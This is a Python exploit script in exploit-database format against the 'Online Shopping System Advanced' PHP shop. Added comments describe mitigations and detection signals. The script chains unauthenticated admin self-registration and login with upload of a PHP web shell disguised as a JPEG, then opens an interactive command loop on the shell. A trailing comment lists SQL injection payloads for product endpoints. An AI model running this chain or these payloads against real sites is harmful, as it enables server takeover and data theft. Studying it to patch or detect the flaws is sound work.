# Exploit Title: Online Shopping System Advanced - Remote Code Execution
# Date: 2025-03-11
# Exploit Author: bRpsd
# Contact: cy@live.no
# Zone-H: www.zone-h.org/archive/notifier=bRpsd
# Vendor: https://github.com/PuneethReddyHC/online-shopping-system-advanced/
# Version: 1.0 [latest]
# Tested on: MacOS XAMPP Darwin Kernel
# CVE : N/A
import requests
import argparse
from bs4 import BeautifulSoup
import os
# Command-line interface: the only input is the base URL of the target
# deployment, e.g. http://host/online-shopping-system-advanced (constructed
# example). Every request below is built relative to it.
parser = argparse.ArgumentParser(description='Unauthenticated Privilege Escalation + Arbitrary File Upload = RCE ')
parser.add_argument('--url', required=True, help='Base URL of the application')
args = parser.parse_args()
# Define the base URL of the application
base_url = args.url
# Step 1: Registering an Admin User
# The registration form at /admin/reg.php is submitted from a brand-new
# session with no prior login, so the underlying weakness is that admin
# self-registration is reachable without any authorization check.
# Mitigation: remove the public admin registration page, or require an
# existing administrator session (server-side) before an admin account can
# be created. Detection: a POST to /admin/reg.php from a session that has
# never authenticated.
register_url = f"{base_url}/admin/reg.php"
register_data = {
    "admin_name": "exploit_admin",
    "admin_email": "exploit_admin@example.com",
    "password_1": "password123",
    "password_2": "password123",
    "reg_user": "Register"
}
# Create a session to maintain cookies
session = requests.Session()
# Send the registration request
# NOTE: the response is not inspected; "Admin created" is printed
# unconditionally, so the message does not prove the account exists.
register_response = session.post(register_url, data=register_data)
print("Admin created")
# Step 2: Login as Admin
# Authenticates the session with the credentials registered above. The
# session object keeps whatever cookie login.php sets, which is what makes
# the admin-only upload endpoint in the next step reachable.
login_url = f"{base_url}/admin/login.php"
login_data = {
    "admin_username": "exploit_admin@example.com",
    "password": "password123",
    "login_admin": "Log in"
}
# Send the login request
# NOTE: as with registration, the response is not checked before
# "Logged in as admin" is printed.
login_response = session.post(login_url, data=login_data)
print("Logged in as admin")
# Step 3: Upload a PHP Shell
# The product edit form's "picture" field receives a file whose name carries
# a .php extension and whose body is PHP source, while the multipart
# Content-Type is declared as image/jpeg. The weakness is an upload handler
# that trusts the client-supplied filename and MIME type instead of
# validating the content. Mitigation: enforce a server-side extension
# allow-list, verify (or re-encode) the image bytes, rename the stored file
# to a server-generated name, and either store uploads outside the web root
# or disable script execution for the upload directory. Detection: a
# multipart upload whose filename ends in .php arriving at edit_product.php.
edit_product_url = f"{base_url}/admin/admin/edit_product.php?product_id=1"
php_shell = "<?php if(isset($_GET['cmd'])) { echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; } ?>"
files = {
    "picture": ("shell.php", php_shell, "image/jpeg")
}
# The remaining form fields are filled with placeholder values so the
# server-side save path accepts the submission.
upload_data = {
    "product_name": "Exploit Product",
    "details": "This is a test product",
    "price": "100",
    "product_type": "1",
    "brand": "1",
    "tags": "exploit",
    "btn_save": "Save"
}
# Send the file upload request
upload_response = session.post(edit_product_url, data=upload_data, files=files)
print("Shell uploaded")
# Step 4: List files in the product_images directory
# This step depends on directory listing (autoindex) being enabled for
# /product_images/: the index page is parsed and the first anchor whose
# href contains "shell.php" is taken as the stored file. Mitigation:
# disable directory indexing on the web server; this removes the discovery
# step but does not by itself fix the upload handling.
# NOTE(review): presumably edit_product.php stores the picture under
# product_images/ with its original name — nothing in this file confirms
# that; verify against the application source.
product_images_url = f"{base_url}/product_images/"
response = session.get(product_images_url)
soup = BeautifulSoup(response.text, 'html.parser')
# Find all links to files in the directory
links = soup.find_all('a')
shell_path = None
for link in links:
    # link.get('href') is None for an <a> without href; the substring test
    # below would then raise TypeError rather than skip the anchor.
    href = link.get('href')
    if 'shell.php' in href:
        shell_path = href
        break
# If the listing exposed the uploaded file, open an interactive loop against
# it; otherwise report and stop.
if shell_path:
    shell_url = f"{product_images_url}{shell_path}"
    print(f"Shell URL: {shell_url}")
    # Step 5: Interact with the Shell
    def execute_command(command):
        """Send ``command`` to the uploaded file via its ``cmd`` query
        parameter and return the raw response body as text.

        Uses the module-level ``session`` and ``shell_url``. No status
        check is performed; whatever the server returns is passed back
        verbatim. Detection signal on the server side: GET requests for a
        .php file under /product_images/ carrying a ``cmd`` parameter.
        """
        response = session.get(shell_url, params={"cmd": command})
        return response.text
    # Example of executing commands
    # Interactive loop; "exit" or "quit" (case-insensitive) ends it.
    while True:
        cmd = input("command: ")
        if cmd.lower() in ['exit', 'quit']:
            break
        output = execute_command(cmd)
        print(output)
else:
    print("Shell location not found.")
# There is also SQL injection in multiple parts of the application, such as
# /product.php?p=71
# /products.php?cat_id=6
# Parameter: p (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: p=73%' AND 2717=2717#
# Type: error-based
# Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
# Payload: p=-8485%' OR 1 GROUP BY CONCAT(0x717a6a6b71,(SELECT (CASE WHEN (7151=7151) THEN 1 ELSE 0 END)),0x716a6b7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
#
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload: p=73%' AND (SELECT 2579 FROM (SELECT(SLEEP(5)))bYFm) AND 'Wgsl%'='Wgsl
#
#Type: UNION query
#Title: MySQL UNION query (NULL) - 10 columns
#Payload: p=73%' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x574f756e6670686a636b76776b5973734d7a434e634a6e66746c704946477a7068656e7a64544e54,0x716a6b7871),NULL,NULL,NULL,NULL,NULL#